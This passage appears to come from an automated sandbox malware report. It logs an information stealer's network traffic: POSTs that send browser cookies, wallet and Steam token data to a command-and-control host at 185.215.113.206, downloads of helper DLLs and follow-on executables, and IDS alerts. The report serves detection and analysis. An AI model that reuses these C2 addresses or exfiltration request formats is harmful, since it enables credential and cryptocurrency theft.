47 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------CGIJECFIECBFIDGDAKFHContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------CGIJECFIECBFIDGDAKFHContent-Disposition: form-data; name="message"fplugins------CGIJECFIECBFIDGDAKFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEBGDAFHJEBGDGIJDHHost: 185.215.113.206Content-Length: 5923Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCGHDHIDHCBGCBGCAEHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 2d 2d 0d 0a Data Ascii: ------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HDHCGHDHIDHCBGCBGCAE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDAAFBGDBKJJJKFIIIJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 2d 2d 0d 0a Data Ascii: ------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="file"------IIDAAFBGDBKJJJKFIIIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="file"------BKJJJDHDGDAAKECAKJDA--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"wallets------BKKKEGIDBGHIDGDHDBFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHDHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 2d 2d 0d 0a Data Ascii: ------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="message"files------BAKEBFBAKKFCBGDHDGHD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECFIECBGDGCAAAEHIEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 2d 2d 0d 0a Data Ascii: ------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="file"------JJECFIECBGDGCAAAEHIE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="message"ybncbhylepme------GDBFBFCBFBKECAAKJKFB--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHCAECGIEBKJKEBGDHDA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 37 32 37 37 37 42 30 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB72777B05E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49738 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 185.215.113.16:80

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49734 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB4CC60 PR_Recv,

0_2_6CB4CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Lp2cm84rNS8nVma&MD=ernD8ueh HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Lp2cm84rNS8nVma&MD=ernD8ueh HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
